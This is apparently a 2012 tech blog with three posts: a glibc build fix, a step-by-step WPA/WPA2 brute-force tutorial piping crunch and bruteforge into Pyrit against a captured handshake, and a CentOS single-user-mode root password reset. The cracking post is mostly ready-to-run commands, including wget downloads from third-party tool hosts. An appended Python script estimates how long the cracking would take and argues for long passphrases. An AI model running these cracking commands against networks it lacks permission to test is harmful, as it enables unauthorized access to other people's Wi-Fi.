Thursday 31 May 2012

x86_64 Linux Error: gnu/stubs-32.h missing error and solution


[root@localhost crunch3.2]# make
Building binary...
/usr/bin/gcc -Wall -lm -pthread -std=c99 -m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 crunch.c -o crunch
In file included from /usr/include/features.h:352,
                 from /usr/include/assert.h:36,
                 from crunch.c:225:
/usr/include/gnu/stubs.h:7:27: error: gnu/stubs-32.h: No such file or directory
make: *** [crunch] Error 1

How do I fix this error? Install the glibc development package:
[root@localhost crunch3.2]# yum -y install glibc-devel

Tuesday 29 May 2012

WPA/WPA2 Brute Forcing


So what are you going to do if your word list does not have the password?
Here is a how-to for cracking WPA/WPA2 by brute forcing on the fly.

First of all, make sure you have the WPA handshake that you acquired from the AP using the aircrack-ng suite.

We will be using Pyrit (http://code.google.com/p/pyrit/) for most of our work here.
Pyrit lets you create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time tradeoff. It has CUDA and OpenCL support, so we can use our more powerful and cheaper GPUs, which are at most 100 times faster than the CPU.

Let's install the needed packages first:
Code:
sudo apt-get install subversion python-dev libssl-dev zlib1g-dev

Now let's compile the latest SVN of Pyrit:
Code:
sudo svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
cd pyrit-read-only/pyrit
sudo python setup.py build
sudo python setup.py install

If you have an NVIDIA or ATI GPU, make sure you compile the extension modules as well.

A good thing to do first is to strip all the unnecessary packets from the .cap file;
this makes the cracking much faster if the original .cap file was large.
Code:
pyrit -r "large_dumps_*.pcap" -e MyNetwork -o tiny_dump_MyNetwork.cap strip


Now we compile a program called crunch:
Code:
wget http://www.darkc0de.com/c0de/c/crunch.txt -O crunch.c
gcc -c crunch.c
gcc -o crunch crunch.o -lm

crunch writes its output to stdout, so you can pipe the results into pyrit.

Now we are all ready to do some cracking, so make sure you run these next examples from the place where you compiled crunch!
Examples:
Code:
./crunch 8 8 0123456789 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This would generate every numeric combination using numbers 0-9 with a length of 8
Code:
./crunch 8 8 abcdefghijklmnopqrstuvwxyz | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above, but using lower-case letters.

Let's say you know the password is admin followed by 3 unknown numbers, so here is what you do:
Code:
./crunch 8 8 0123456789 -t admin@@@ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

So only the @ characters change, cycling through every number combination.

Here is an example that uses all lengths from 8 to 63 (lol)
Code:
./crunch 8 63 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough


Too bad crunch lacks the special characters (?!"#$%&'()*+,-./:;<=>?[\]^_`{|}~)
There is an alternative program called bruteforge: http://masterzorag.blogspot.com/
This program has more options, but bruteforge does NOT compute all character combinations; it skips ahead when a condition is verified.
Get:
Code:
wget http://mz03.netfirms.com/py/bruteforge -O bruteforge.py


Examples: 
Code:
python bruteforge.py bruteforge -c 2 -a 00000000 -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This will generate numeric strings of length 8 to 9
Code:
python bruteforge.py bruteforge -a aaaaaaaa -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above, but using lower-case letters.

Notes: You can compute with all characters by using the -c 6 option of bruteforge. You can also use import_passwords instead of attack_passthrough to insert the generated strings into a database you have created with pyrit.
Example:
Code:
python bruteforge.py bruteforge -a aaaaaaaa | pyrit  -i - import_passwords


Conclusion:
Well, you can compute every possible combination, but it will just take time. This tutorial is just a demo; don't try this at home unless you have the performance of a petaflop.
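
To put numbers on that conclusion, here is an added example (not part of the original post and not Pyrit's own code). It derives a WPA/WPA2 PMK with the standard PBKDF2 construction, shows that the result depends on the ESSID (so a precomputed database only applies to one ESSID), and estimates how long the crunch keyspaces above take to exhaust. The 100x GPU factor is the post's own figure used as an assumption, and the passphrase and second ESSID are constructed sample values.

```python
import hashlib
import time

PBKDF2_ROUNDS = 4096  # iteration count fixed by WPA/WPA2-PSK
PMK_LEN = 32          # 256-bit pairwise master key

def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(),
                               PBKDF2_ROUNDS, PMK_LEN)

def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Candidates produced by a crunch-style <min> <max> <charset> run."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def measure_rate(samples: int = 20) -> float:
    """PMK derivations per second on one CPU core of this machine."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk("candidate%08d" % i, "AP Name")
    return samples / (time.perf_counter() - start)

def years_to_exhaust(candidates: int, pmk_per_second: float) -> float:
    """Worst-case time to try every candidate at a given PMK rate."""
    return candidates / pmk_per_second / (365 * 24 * 3600)

if __name__ == "__main__":
    # Same passphrase, different ESSID -> different PMK, so a precomputed
    # database only helps against the one ESSID it was built for.
    a = derive_pmk("admin123", "AP Name")        # constructed sample values
    b = derive_pmk("admin123", "Another AP")
    print("PMK depends on ESSID:", a != b)

    cpu_rate = measure_rate()
    gpu_rate = cpu_rate * 100  # assumption: the post's "at most 100 times" figure
    print("measured %.0f PMK/s on one core, assuming %.0f PMK/s on GPU"
          % (cpu_rate, gpu_rate))
    runs = [  # (label, charset size, min length, max length) from the post
        ("admin + 3 digits", 10, 3, 3),
        ("8 digits", 10, 8, 8),
        ("8 lower-case letters", 26, 8, 8),
        ("8..63 alphanumeric", 62, 8, 63),
    ]
    for label, size, lo, hi in runs:
        n = keyspace(size, lo, hi)
        print("%-22s %.3g candidates, %.3g years at GPU rate"
              % (label, n, years_to_exhaust(n, gpu_rate)))
```

The output shows how quickly the exhaust time grows with charset size and length, which is the practical argument for a long random passphrase.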

Resetting forgotten root password on CentOS


Boot the system and when you see the following screen, press any key





At the following screen, press e



It will take you to the following screen



Highlight the line with vmlinuz in it by using the arrow keys and press e. The next screen will look like below




Now type single or init 1 at the very end of the line, like so.



Then press Enter and then b to boot the system with the new argument.
The system will boot into single-user mode and you will see a bash prompt like the one below



Now change the password:
passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

Type in the new password and then run

reboot

to restart the system.